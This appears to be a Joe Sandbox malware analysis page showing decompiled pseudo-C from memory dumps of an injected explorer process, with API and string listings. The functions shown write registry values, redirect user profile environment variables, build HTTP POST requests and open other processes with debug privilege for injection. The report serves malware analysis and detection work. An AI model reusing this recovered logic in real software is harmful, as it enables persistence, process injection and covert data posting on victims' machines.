				if(( *0x1538b3c & 0x0000ffff) != 9 ||  *0x153a84c == 0) {
					goto L35;
				} else {
					_v20 = 0;
					_v36 = 0;
					_v32 = E01515230(_t169, 0x2bed);
					_t118 = E01515350(_t169, 0x925);
					_t217 = _t215 + 8;
					_v40 = _t118;
					_v24 = 0;
					if(_a20 == 0) {
						L34:
						E01513990( &_v36, 0xfffffffe);
						E01515460( &_v32);
						E01515460( &_v40);
						return _v24;
					}
					if(_a16 != 4) {
						if(_a16 != 1) {
							while(0 != 0) {
							}
							_v24 = 0xfffffffc;
							goto L34;
						}
						_t124 = lstrlenW("C:\Windows");
						_t126 = lstrlenW(_v32);
						_t172 = _a8;
						_t127 = lstrlenW(_a8);
						_t128 = lstrlenW(_a12);
						_v28 = _t124 + _t126 + 1 + _t127 + _t128 + lstrlenW( &(_a20[0x28]));
						goto L11;
					} else {
						_t158 = lstrlenW("C:\Windows");
						_t159 = lstrlenW(_v32);
						_t161 = lstrlenW(_a8);
						_t172 = _a12;
						_v28 = _t158 + _t159 + 1 + _t161 + lstrlenW(_a12) + 0x28;
						L11:
						_t30 = _v28 + 2; // 0x2
						_t133 = E01513960(_t172, _v28 + _t30);
						_t217 = _t217 + 4;
						_v36 = _t133;
						if(_v36 != 0) {
							_t135 = E01513CA0(_v36, _v28, L"%s\\system32\\", "C:\Windows");
							_t217 = _t217 + 0x10;
							_v48 = _t135;
							if(_v48 >= 0) {
								if(_a16 != 4) {
									_push(_a20);
									_push(_a12);
									_push(L"REG_SZ");
									E01513CA0(_v36 + _v48 * 2, _v28 - _v48, _v32, _a8);
									_t221 = _t217 + 0x1c;
								} else {
									E01513CA0( &_v180, 0x40, L"%u",  *_a20);
									_push( &_v180);
									_push(_a12);
									_push(L"REG_DWORD");
									E01513CA0(_v36 + _v48 * 2, _v28 - _v48, _v32, _a8);
									_t221 = _t217 + 0x2c;
								}
								while(0 != 0) {
								}
								_v52 = GetProcAddress(GetModuleHandleA(_v40), "Wow64DisableWow64FsRedirection");
								E01515460( &_v40);
								_t222 = _t221 + 4;
								if(_v52 != 0) {
									_v52( &_v184);
									_t222 = _t222 + 4;
								}
								_t143 = E0151B220( &_v20, _v36,  &_v20, 0x1388, 1);
								_t217 = _t222 + 0x10;
								if(_t143 != 0) {
									while(0 != 0) {
									}
									goto L32;
								} else {
									while(0 != 0) {
									}
									_v24 = 0xfffffff9;
									L32:
									_v44 = GetProcAddress(GetModuleHandleA(_v40), "Wow64EnableWow64FsRedirection");
									if(_v44 != 0) {
										_v44( &_v188);
										_t217 = _t217 + 4;
									}
									goto L34;
								}
							}
							while(0 != 0) {
							}
							_v24 = 0xfffffffa;
							goto L34;
						}
						while(0 != 0) {
						}
						_v24 = 0xfffffffb;
						goto L34;
					}
				}
			}

0x0151c47d
0x0151c487
0x0151c733
0x0151c743
0x0151c749
0x0151c750
0x0151c764
0x0151c7b8
0x0151c7bf
0x0151c7d8
0x0151c7dc
0x0151c7de
0x0151c7e2
0x00000000
0x0151c7e8
0x0151c7c1
0x0151c7c5
0x0151c7cb
0x00000000
0x0151c7d1
0x0151c77c
0x0151c782
0x0151c789
0x0151c7a2
0x0151c7a6
0x00000000
0x0151c7a8
0x0151c78b
0x0151c78f
0x0151c795
0x00000000
0x0151c79b
0x0151c752
0x0151c756
0x00000000
0x0151c758
0x0151c48d
0x0151c497
0x00000000
0x0151c4aa
0x0151c4aa
0x0151c4b1
0x0151c4c5
0x0151c4cd
0x0151c4d2
0x0151c4d5
0x0151c4d8
0x0151c4e3
0x0151c705
0x0151c70b
0x0151c717
0x0151c723
0x00000000
0x0151c72b
0x0151c4ed
0x0151c52d
0x0151c576
0x0151c57a
0x0151c57c
0x00000000
0x0151c57c
0x0151c534
0x0151c540
0x0151c54a
0x0151c54e
0x0151c55a
0x0151c571
0x00000000
0x0151c4ef
0x0151c4f4
0x0151c500
0x0151c50e
0x0151c516
0x0151c524
0x0151c588
0x0151c58b
0x0151c590
0x0151c595
0x0151c598
0x0151c59f
0x0151c5c5
0x0151c5ca
0x0151c5cd
0x0151c5d4
0x0151c5ec
0x0151c640
0x0151c644
0x0151c645
0x0151c663
0x0151c668
0x0151c5ee
0x0151c602
0x0151c610
0x0151c614
0x0151c615
0x0151c633
0x0151c638
0x0151c638
0x0151c66b
0x0151c66f
0x0151c687
0x0151c68e
0x0151c693
0x0151c69a
0x0151c6a3
0x0151c6a6
0x0151c6a6
0x0151c6b8
0x0151c6bd
0x0151c6c2
0x0151c6d3
0x0151c6d7
0x00000000
0x0151c6c4
0x0151c6c4
0x0151c6c8
0x0151c6ca
0x0151c6d9
0x0151c6ef
0x0151c6f6
0x0151c6ff
0x0151c702
0x0151c702
0x00000000
0x0151c6f6
0x0151c6c2
0x0151c5d6
0x0151c5da
0x0151c5dc
0x00000000
0x0151c5dc
0x0151c5a1
0x0151c5a5
0x0151c5a7
0x00000000
0x0151c5a7
0x0151c4ed

APIs

lstrlenW.KERNEL32(C:\Windows,?,00000000), ref: 0151C4F4
lstrlenW.KERNEL32(80000001,?,00000000), ref: 0151C500
lstrlenW.KERNEL32(?,?,00000000), ref: 0151C50E
lstrlenW.KERNEL32(00000000,?,00000000), ref: 0151C51A

Part of subcall function 01513CA0: wvnsprintfW.SHLWAPI(?,?,?,?,?,?,?,?,TEMP), ref: 01513CCE
Part of subcall function 01513CA0: lstrlenW.KERNEL32(00000000), ref: 01513CF5

lstrlenW.KERNEL32(C:\Windows,?,00000000), ref: 0151C534
lstrlenW.KERNEL32(80000001,?,00000000), ref: 0151C540
lstrlenW.KERNEL32(?,?,00000000), ref: 0151C54E
lstrlenW.KERNEL32(00000000,?,00000000), ref: 0151C55A
lstrlenW.KERNEL32(-00000028,?,00000000), ref: 0151C569
GetModuleHandleA.KERNEL32(?,Wow64DisableWow64FsRedirection,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0151C67A
GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0151C681
GetModuleHandleA.KERNEL32(?,Wow64EnableWow64FsRedirection), ref: 0151C6E2
GetProcAddress.KERNEL32(00000000), ref: 0151C6E9
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000002,?,00000000), ref: 0151C743
RegSetValueExW.ADVAPI32(?,00000004,00000000,00000000,00000000,80000001), ref: 0151C77C
RegCloseKey.ADVAPI32(?), ref: 0151C795
RegDeleteValueW.ADVAPI32(?,00000004), ref: 0151C7B2
RegCloseKey.ADVAPI32(?), ref: 0151C7CB
RegCloseKey.ADVAPI32(?), ref: 0151C7E2

Strings

REG_SZ, xrefs: 0151C645
REG_DWORD, xrefs: 0151C615
Wow64EnableWow64FsRedirection, xrefs: 0151C6D9
C:\Windows, xrefs: 0151C4EF, 0151C52F, 0151C5B3
%s\system32\, xrefs: 0151C5B8
Wow64DisableWow64FsRedirection, xrefs: 0151C671

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$Close$AddressHandleModuleProcValue$DeleteOpenwvnsprintf
String ID: %s\system32\$C:\Windows$REG_DWORD$REG_SZ$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection
API String ID: 2270979939-567110100
Opcode ID: 3cb8fadb2e1443669004b3917e41d0c2f13d9d2ac8affc73e9d86a9b646df619
Instruction ID: d0b781a43f967c0143ce2a1e6a12792dd7b6f0d0b95c21d6756794dd8cb106a8
Opcode Fuzzy Hash: 3cb8fadb2e1443669004b3917e41d0c2f13d9d2ac8affc73e9d86a9b646df619
Instruction Fuzzy Hash: A7B1F7B6D4020ADFEF21CFA8C849EBE77B4BF48314F10491CE516AB288E7759504CBA1

Uniqueness

Uniqueness Score: 3.53%

Function 01506383, Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01506383(void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				WCHAR* _v12;
				int _v16;
				char _v20;
				int _v24;
				void _v50;
				short _v56;
				char _v456;
				void* __ebx;
				void* _t36;
				WCHAR* _t37;
				char _t38;
				WCHAR* _t40;
				WCHAR* _t41;
				long _t64;
				long _t65;
				WCHAR* _t66;
				WCHAR* _t74;
				WCHAR* _t75;
				WCHAR* _t76;
				WCHAR* _t80;
				WCHAR* _t82;
				WCHAR* _t91;
				void* _t93;
				WCHAR* _t94;
				WCHAR* _t106;
				void* _t109;
				void* _t110;
				signed int _t113;
				void* _t121;
				WCHAR* _t128;
				void* _t131;
				void* _t132;
				void* _t133;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t139;

				_t139 = __fp0;
				_t137 = __eflags;
				_t121 = __edi;
				_t106 = 0;
				_v16 = 0;
				_v24 = 0;
				_v20 = 0;
				E015077AC();
				E0150EA96(__esi, "YN"); // executed
				E015143A0(); // executed
				_t36 = E0150633E(_t137);
				if(_t36 != 0) {
					_push(__esi);
					_t128 = 0x1538b44;
					_t37 = E0151FA50(0x1538b44);
					_pop(_t109);
					_v24 = _t37;
					__eflags = _t37;
					if(_t37 != 0) {
						E0151F820(_t109, _t37); // executed
						E01513990( &_v24, 0xffffffff);
						_t131 = _t131 + 0xc;
					}
					_t38 = E0151FA70(_t128);
					_pop(_t110);
					_v20 = _t38;
					__eflags = _t38 - _t106;
					if(__eflags != 0) {
						E0151F820(_t110, _t38); // executed
						E01513990( &_v20, 0xffffffff);
						_t131 = _t131 + 0xc; // executed
					}
					E015066F6(__eflags); // executed
					_t40 = E015157A0();
					__eflags = _t40;
					if(_t40 != 0) {
						L12:
						_push(_t106);
						_push(L"\\system32\\config\\systemprofile");
						_t41 = E01516F50("C:\Windows");
						_t132 = _t131 + 0xc;
						_v12 = _t41;
						__eflags = _t41 - _t106;
						if(_t41 != _t106) {
							_t66 = StrStrIW("C:\Users\Luke", _t41);
							__eflags = _t66;
							if(_t66 != 0) {
								_push(_t121);
								asm("movsd");
								asm("movsw");
								_t113 = 6;
								memset( &_v50, 0, _t113 << 2);
								asm("stosw");
								GetEnvironmentVariableW(L"SystemDrive",  &_v56, 0x10);
								_push(0x1538ca8);
								_t128 = L"\\Users\\";
								_push(_t128);
								_t74 = E01516F50( &_v56);
								_t132 = _t132 + 0x18;
								_v8 = _t74;
								__eflags = _t74 - _t106;
								if(_t74 != _t106) {
									_t75 = E0151BD00(_t74);
									__eflags = _t75;
									if(_t75 != 0) {
										_t76 = SetEnvironmentVariableW(L"USERPROFILE", _v8);
										__eflags = _t76;
										if(_t76 != 0) {
											lstrcpynW("C:\Users\Luke", _v8, 0x105);
										}
										E01513990( &_v8, 0xfffffffe);
										_push(L"\\AppData\\Roaming");
										_push(0x1538ca8);
										_push(_t128);
										_t80 = E01516F50( &_v56);
										_t135 = _t132 + 0x18;
										_v8 = _t80;
										__eflags = _t80;
										if(_t80 != 0) {
											SetEnvironmentVariableW(L"APPDATA", _t80);
											E01513990( &_v8, 0xfffffffe);
										}
										_push(L"\\AppData\\Local");
										_push(0x1538ca8);
										_push(_t128);
										_t82 = E01516F50( &_v56);
										_t132 = _t135 + 0x10;
										_v8 = _t82;
										__eflags = _t82;
										if(_t82 != 0) {
											SetEnvironmentVariableW(L"LOCALAPPDATA", _t82);
											E01513990( &_v8, 0xfffffffe);
										}
										_t106 = 0;
										__eflags = 0;
									}
								}
							}
							E01513990( &_v12, 0xfffffffe);
							_pop(_t110);
						}
						E01506EC1(_t110);
						SetThreadPriority(GetCurrentThread(), 0xffffffff); // executed
						__imp__#115(0x202,  &_v456); // executed
						E01502E13(); // executed
						E01505564(_t110, __eflags); // executed
						E01506FC0(_t128, __eflags, E0150631C, _t106, _t106, _t106); // executed
						_t133 = _t132 + 0x10;
						E01504161(_t106, _t110, __eflags);
						E01506787(__eflags); // executed
						E01506017(_t110, _t128, __eflags); // executed
						 *0x15379a8 = _t106;
						 *0x15379ac = _t106;
						while(1) {
							__eflags =  *0x15379b4 - _t106; // 0x0
							if(__eflags != 0) {
								break;
							}
							E01514080(0x15379a0);
							E01504058(_t110, _t128,  *0x15379a0,  *0x15379a4); // executed
							_t133 = _t133 + 0xc;
							__eflags =  *0x15379b4 - _t106; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t65 = WaitForSingleObject( *0x15379b0, 0x1388);
							_v16 = _t65;
							__eflags = _t65 - _t106;
							if(_t65 == _t106) {
								break;
							}
						}
						E01505AB9(_t128);
						E01502561();
						E015157F0(_t110, __eflags);
						E015071A4();
						E015025B2();
						E0150552B();
						E01515830(_t110);
						E01515F30(_t110, 1);
						 *0x15379b4 = 2;
						E015072AA();
						E01506745();
						_t64 = _v16;
						goto L30;
					} else {
						_v8 = _t106;
						_t91 = E01518580(_t139,  *0x1538eac,  *0x153ac5c,  &_v8, _t106, _t106, _t106);
						_t136 = _t131 + 0x18;
						_v12 = _t91;
						__eflags = _t91 - _t106;
						if(_t91 != _t106) {
							E01515D50(_t110, _t91, _v8, _t106, 1); // executed
							E01513990( &_v12, _t106);
							_t136 = _t136 + 0x18;
						}
						E01515ED0(_t110, _t106, _t128); // executed
						_t93 = E01515B10(_t110, __eflags, 4);
						_t131 = _t136 + 0xc;
						__eflags = _t93 - _t106;
						if(__eflags == 0) {
							goto L12;
						} else {
							_t94 = E01513E60(__eflags, _t93);
							_pop(_t110);
							__eflags = _t94;
							if(_t94 <= 0) {
								goto L12;
							}
							_t64 = 1;
							L30:
							return _t64;
						}
					}
				}
				return _t36 + 1;
			}

0x01506383
0x01506383
0x01506383
0x0150638d
0x0150638f
0x01506392
0x01506395
0x01506398
0x015063a2
0x015063a8
0x015063ad
0x015063b4
0x015063bc
0x015063bd
0x015063c3
0x015063c8
0x015063c9
0x015063cc
0x015063ce
0x015063d1
0x015063dc
0x015063e1
0x015063e1
0x015063e5
0x015063ea
0x015063eb
0x015063ee
0x015063f0
0x015063f3
0x015063fe
0x01506403
0x01506403
0x01506406
0x0150640b
0x01506410
0x01506412
0x0150647a
0x0150647a
0x0150647b
0x01506485
0x0150648a
0x0150648d
0x01506490
0x01506492
0x0150649e
0x015064a4
0x015064a6
0x015064ac
0x015064b5
0x015064b8
0x015064ba
0x015064c0
0x015064c2
0x015064cf
0x015064da
0x015064db
0x015064e3
0x015064e5
0x015064ea
0x015064ed
0x015064f0
0x015064f2
0x015064f9
0x015064ff
0x01506501
0x01506515
0x01506517
0x01506519
0x01506528
0x01506528
0x01506534
0x01506539
0x0150653e
0x01506542
0x01506544
0x01506549
0x0150654c
0x0150654f
0x01506551
0x01506559
0x01506561
0x01506567
0x01506568
0x0150656d
0x01506571
0x01506573
0x01506578
0x0150657b
0x0150657e
0x01506580
0x01506588
0x01506590
0x01506596
0x01506597
0x01506597
0x01506597
0x01506501
0x01506599
0x015065a0
0x015065a6
0x015065a6
0x015065a7
0x015065b5
0x015065c7
0x015065cd
0x015065d2
0x015065df
0x015065e4
0x015065e7
0x015065ec
0x015065f1
0x015065f6
0x015065fc
0x01506642
0x01506642
0x01506648
0x00000000
0x00000000
0x01506609
0x0150661a
0x0150661f
0x01506622
0x01506628
0x00000000
0x00000000
0x01506635
0x0150663b
0x0150663e
0x01506640
0x00000000
0x00000000
0x01506640
0x0150664a
0x0150664f
0x01506654
0x01506659
0x0150665e
0x01506663
0x01506668
0x0150666f
0x01506675
0x0150667f
0x01506684
0x01506689
0x00000000
0x01506414
0x01506421
0x0150642a
0x0150642f
0x01506432
0x01506435
0x01506437
0x01506440
0x0150644a
0x0150644f
0x0150644f
0x01506454
0x0150645b
0x01506460
0x01506463
0x01506465
0x00000000
0x01506467
0x01506468
0x0150646d
0x0150646e
0x01506470
0x00000000
0x00000000
0x01506474
0x0150668c
0x00000000
0x0150668c
0x01506465
0x01506412
0x00000000

Strings

SystemDrive, xrefs: 015064CA
Luke, xrefs: 015064D5, 015064DA, 0150653E, 0150656D
jkfkdm, xrefs: 015063BD, 015063C2, 015063E4, 01506452
LOCALAPPDATA, xrefs: 01506583
\AppData\Roaming, xrefs: 01506539
APPDATA, xrefs: 01506554
\AppData\Local, xrefs: 01506568
C:\Users\user, xrefs: 01506499, 01506523
\Users\, xrefs: 015064DB, 015064E3, 01506542, 01506571
\system32\config\systemprofile, xrefs: 0150647B
C:\Windows, xrefs: 01506480
USERPROFILE, xrefs: 01506510

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateCurrentEventProcessstrncmpstrncpy
String ID: APPDATA$C:\Users\user$C:\Windows$LOCALAPPDATA$user$SystemDrive$USERPROFILE$\AppData\Local$\AppData\Roaming$\Users\$\system32\config\systemprofile$jkfkdm
API String ID: 2815271098-3427018594
Opcode ID: acb7aa7a3b8e7529a562dc561edea89398b564030fb39b0f57da91752d53e790
Instruction ID: 39705d0910274e823a42d9fe7dc1d9b23b28c366a44b8d29c5d530ff524af34b
Opcode Fuzzy Hash: acb7aa7a3b8e7529a562dc561edea89398b564030fb39b0f57da91752d53e790
Instruction Fuzzy Hash: 0D71D3B2D00217BAEB12BFF49C84C9E77ADBFA5210B600529F511EF1C9EB718A149771

Uniqueness

Uniqueness Score: 100.00%

Function 015145B0, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 334
stringUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT(?,00000000,000000FF), ref: 01514624
memset.MSVCRT(?,00000000,000000FF), ref: 01514646
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 01514711
GetLastError.KERNEL32 ref: 015147A7
GetLastError.KERNEL32 ref: 01514811
GetLastError.KERNEL32 ref: 015148C5
lstrlenA.KERNEL32(?,00000000,00000000), ref: 01514937
GetLastError.KERNEL32 ref: 01514990

Part of subcall function 01514490: GetLastError.KERNEL32(?,?,0151491F), ref: 015144B5

GetLastError.KERNEL32 ref: 01514A72

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 01514653
<, xrefs: 015146FA
POST, xrefs: 0151485F

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast$lstrlenmemset
String ID: <$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 4043594366-2842678110
Opcode ID: 8d18d238c4907140198a400cb027a350f45bd2c0a491898b7cdec4b5728e6bc2
Instruction ID: 45708764013f0c4dd4e8e1d1e21042e185d1ec4ade3779d4d8db8b559ce9c7da
Opcode Fuzzy Hash: 8d18d238c4907140198a400cb027a350f45bd2c0a491898b7cdec4b5728e6bc2
Instruction Fuzzy Hash: FAE139B5904228DBEB32CF64DC48BEEB7B5BB48305F0045D9E559AB284DBB55AC4CF40

Uniqueness

Uniqueness Score: 100.00%

Function 003F1950, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 299
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E003F1950(void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				intOrPtr _v12;
				void** _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				WCHAR* _v32;
				char _v72;
				void* _v76;
				long _v80;
				char _v148;
				int _v152;
				char _v220;
				long _t88;
				WCHAR* _t90;
				signed int _t99;
				signed int _t100;
				intOrPtr _t104;
				intOrPtr _t108;
				int _t109;
				signed int _t110;
				signed int _t112;
				signed int _t127;
				void _t132;
				signed int _t135;
				void** _t138;
				int _t140;
				WCHAR* _t146;
				int _t147;
				signed int _t152;
				intOrPtr _t156;
				void** _t175;
				intOrPtr _t207;
				signed int _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t229;

				_t229 = __fp0;
				_v28 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = _a8;
				_v8 = 0;
				if( *0x40f6d0 == 0) {
					_t88 = GetCurrentProcessId();
					_t156 = _a4;
					__eflags =  *((intOrPtr*)(_t156 + 8)) - _t88;
					if( *((intOrPtr*)(_t156 + 8)) != _t88) {
						_v24 = 0;
						while(1) {
							__eflags = _v24 -  *0x40f6b8; // 0xb
							if(__eflags >= 0) {
								break;
							}
							_t207 =  *0x40f6c0; // 0x161f8c0
							_t152 = E003F49E0(_a4 + 0x24,  *((intOrPtr*)(_t207 + _v24 * 4)));
							_t210 = _t210 + 8;
							__eflags = _t152;
							if(_t152 == 0) {
								_t209 = _v24 + 1;
								__eflags = _t209;
								_v24 = _t209;
								continue;
							}
							return 1;
						}
						_t90 = E003F4AE0(_a4 + 0x24);
						_t211 = _t210 + 4;
						_v32 = _t90;
						__eflags = _v32;
						if(_v32 == 0) {
							L15:
							E003F6FE0( &_v72, E003F46E0(_a4 + 0x24, 0x5c),  *(_a4 + 8)); // executed
							_t213 = _t211 + 0x14;
							_v76 = OpenEventA(2, 0,  &_v72);
							__eflags = _v76;
							if(_v76 == 0) {
								_v80 = GetLastError();
								__eflags = _v80 - 2;
								if(_v80 == 2) {
									_v20 = OpenProcess(0x43a, 0,  *(_a4 + 8));
									__eflags = _v20;
									if(_v20 != 0) {
										__eflags = _v28;
										if(_v28 != 0) {
											L26:
											_t160 =  *(_a4 + 8);
											_t99 = E003F10A0( *(_a4 + 8),  *(_a4 + 8), _a4 + 0x24);
											_t214 = _t213 + 8;
											__eflags = _t99;
											if(_t99 == 0) {
												_t100 =  *0x411408; // 0x0
												__eflags = _t100 & 0x00000002;
												if(__eflags == 0) {
													L35:
													_v152 = 0;
													E003F8190(__eflags, 1,  &_v148);
													_t104 = E003F8210( &_v148, _v12 + 0x14); // executed
													 *((intOrPtr*)(_v12 + 0x10)) = _t104;
													E003F8190(__eflags, 2,  &_v220);
													_t108 = E003F8210( &_v220, _v12 + 0x1c); // executed
													 *((intOrPtr*)(_v12 + 0x18)) = _t108;
													_t109 = E003F7F40( &_v220, 0x74f);
													_t219 = _t214 + 0x24;
													_v152 = _t109;
													__eflags = _v152;
													if(_v152 != 0) {
														__eflags = _v12 + 0x24;
														_t132 = E003F8210(_v152, _v12 + 0x24); // executed
														 *(_v12 + 0x20) = _t132;
														E003F8170( &_v152);
														_t219 = _t219 + 0xc;
													}
													_t110 = E003F45D0(_v20);
													_t220 = _t219 + 4;
													__eflags = _t110;
													if(__eflags == 0) {
														_t112 = E003F69A0(__eflags, _t229, _v20, _v12); // executed
														_t221 = _t220 + 8;
														__eflags = _t112;
														if(_t112 == 0) {
															goto L47;
														} else {
															goto L44;
														}
														while(1) {
															L44:
															__eflags = 0;
															if(0 == 0) {
																break;
															}
														}
														__eflags = _a4 + 0x24;
														E003F1000( *(_a4 + 8), _a4 + 0x24);
														_t221 = _t221 + 8;
														goto L47;
													} else {
														_t127 = E003F6AB0(__eflags, _t229, _v20, _v12);
														_t221 = _t220 + 8;
														__eflags = _t127;
														if(_t127 == 0) {
															L42:
															L47:
															E003F3F10(_v12 + 0x10,  *((intOrPtr*)(_v12 + 0x14)));
															E003F3F10(_v12 + 0x18,  *((intOrPtr*)(_v12 + 0x1c)));
															_t160 = _v12 + 0x20;
															__eflags = _v12 + 0x20;
															E003F3F10(_v12 + 0x20,  *(_v12 + 0x24));
															_t214 = _t221 + 0x18;
															L48:
															E003F3F10( &_v16, 0);
															__eflags = _v20;
															if(_v20 != 0) {
																CloseHandle(_v20);
															}
															__eflags = _v28;
															if(_v28 != 0) {
																E003F7340(_t160, "SeDebugPrivilege", 0);
															}
															Sleep(1); // executed
															return 1;
														} else {
															goto L39;
														}
														while(1) {
															L39:
															__eflags = 0;
															if(0 == 0) {
																break;
															}
														}
														__eflags = _a4 + 0x24;
														E003F1000( *(_a4 + 8), _a4 + 0x24);
														_t221 = _t221 + 8;
														goto L42;
													}
												}
												_t160 =  *0x4117cc; // 0x15a07b7
												_t135 = E003F49E0(_a4 + 0x24, _t160);
												_t214 = _t214 + 8;
												__eflags = _t135;
												if(__eflags == 0) {
													goto L35;
												} else {
													goto L32;
												}
												while(1) {
													L32:
													__eflags = 0;
													if(0 == 0) {
														break;
													}
												}
												goto L48;
											} else {
												goto L27;
											}
											while(1) {
												L27:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											goto L48;
										}
										_t138 = E003F74B0(_v20); // executed
										_t213 = _t213 + 4;
										_v16 = _t138;
										__eflags = _v16;
										if(_v16 != 0) {
											_t175 =  *0x40f864; // 0x161f7d0
											_t160 =  *_v16;
											_t140 = EqualSid( *_v16,  *_t175);
											__eflags = _t140;
											if(_t140 != 0) {
												goto L26;
											}
											goto L48;
										}
										goto L48;
									}
									return 1;
								}
								return 1;
							}
							CloseHandle(_v76);
							return 1;
						}
						_t146 =  *0x40fd7c; // 0x40fbd6
						_t147 = lstrcmpiW(_v32, _t146);
						__eflags = _t147;
						if(_t147 != 0) {
							goto L15;
						} else {
							goto L12;
						}
						while(1) {
							L12:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						E003F3F10( &_v32, 0xfffffffe);
						return 1;
					}
					return 1;
				}
				return 0;
			}

0x003f1950
0x003f1959
0x003f1960
0x003f1967
0x003f1971
0x003f1974
0x003f1982
0x003f198b
0x003f1991
0x003f1994
0x003f1997
0x003f19a3
0x003f19b5
0x003f19b8
0x003f19be
0x00000000
0x00000000
0x003f19c3
0x003f19d4
0x003f19d9
0x003f19dc
0x003f19de
0x003f19af
0x003f19af
0x003f19b2
0x00000000
0x003f19b2
0x00000000
0x003f19e0
0x003f19f3
0x003f19f8
0x003f19fb
0x003f19fe
0x003f1a02
0x003f1a36
0x003f1a53
0x003f1a58
0x003f1a69
0x003f1a6c
0x003f1a70
0x003f1a8e
0x003f1a91
0x003f1a95
0x003f1ab5
0x003f1ab8
0x003f1abc
0x003f1ac8
0x003f1acc
0x003f1b06
0x003f1b10
0x003f1b14
0x003f1b19
0x003f1b1c
0x003f1b1e
0x003f1b2b
0x003f1b30
0x003f1b33
0x003f1b5a
0x003f1b5a
0x003f1b6d
0x003f1b83
0x003f1b8e
0x003f1b9a
0x003f1bb0
0x003f1bbb
0x003f1bc3
0x003f1bc8
0x003f1bcb
0x003f1bd1
0x003f1bd8
0x003f1bdd
0x003f1be8
0x003f1bf3
0x003f1bfd
0x003f1c02
0x003f1c02
0x003f1c09
0x003f1c0e
0x003f1c11
0x003f1c13
0x003f1c4f
0x003f1c54
0x003f1c57
0x003f1c59
0x00000000
0x00000000
0x00000000
0x00000000
0x003f1c5b
0x003f1c5b
0x003f1c5b
0x003f1c5d
0x00000000
0x00000000
0x003f1c5f
0x003f1c64
0x003f1c6f
0x003f1c74
0x00000000
0x003f1c15
0x003f1c1d
0x003f1c22
0x003f1c25
0x003f1c27
0x003f1c45
0x003f1c77
0x003f1c85
0x003f1c9b
0x003f1cad
0x003f1cad
0x003f1cb1
0x003f1cb6
0x003f1cb9
0x003f1cbf
0x003f1cc7
0x003f1ccb
0x003f1cd1
0x003f1cd1
0x003f1cd7
0x003f1cdb
0x003f1ce4
0x003f1ce9
0x003f1cee
0x00000000
0x00000000
0x00000000
0x00000000
0x003f1c29
0x003f1c29
0x003f1c29
0x003f1c2b
0x00000000
0x00000000
0x003f1c2d
0x003f1c32
0x003f1c3d
0x003f1c42
0x00000000
0x003f1c42
0x003f1c13
0x003f1b35
0x003f1b43
0x003f1b48
0x003f1b4b
0x003f1b4d
0x00000000
0x00000000
0x00000000
0x00000000
0x003f1b4f
0x003f1b4f
0x003f1b4f
0x003f1b51
0x00000000
0x00000000
0x003f1b53
0x00000000
0x00000000
0x00000000
0x00000000
0x003f1b20
0x003f1b20
0x003f1b20
0x003f1b22
0x00000000
0x00000000
0x003f1b24
0x00000000
0x003f1b26
0x003f1ad2
0x003f1ad7
0x003f1ada
0x003f1add
0x003f1ae1
0x003f1ae8
0x003f1af4
0x003f1af7
0x003f1afd
0x003f1aff
0x00000000
0x00000000
0x00000000
0x003f1b01
0x00000000
0x003f1ae3
0x00000000
0x003f1abe
0x00000000
0x003f1a97
0x003f1a76
0x00000000
0x003f1a7c
0x003f1a04
0x003f1a0e
0x003f1a14
0x003f1a16
0x00000000
0x00000000
0x00000000
0x00000000
0x003f1a18
0x003f1a18
0x003f1a18
0x003f1a1a
0x00000000
0x00000000
0x003f1a1c
0x003f1a24
0x00000000
0x003f1a2c
0x00000000
0x003f1999
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 003F198B

Strings

SeDebugPrivilege, xrefs: 003F1CDF

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: SeDebugPrivilege
API String ID: 2050909247-2896544425
Opcode ID: 4394d985e20c35c3cc36ffecbcf5d557a8fbaef7d5c2ebc77fb870280ed97bdf
Instruction ID: 4cbbeec6087c6ccdb22e322fdee95a2303282be5815fd6a80e4d27a95d2b2c7a
Opcode Fuzzy Hash: 4394d985e20c35c3cc36ffecbcf5d557a8fbaef7d5c2ebc77fb870280ed97bdf
Instruction Fuzzy Hash: 75B1B4B5D0020CEBDB15DBA4EC45FBE7778AF44309F144528EA05AB346E735EA84CBA1

Uniqueness

Uniqueness Score: 100.00%

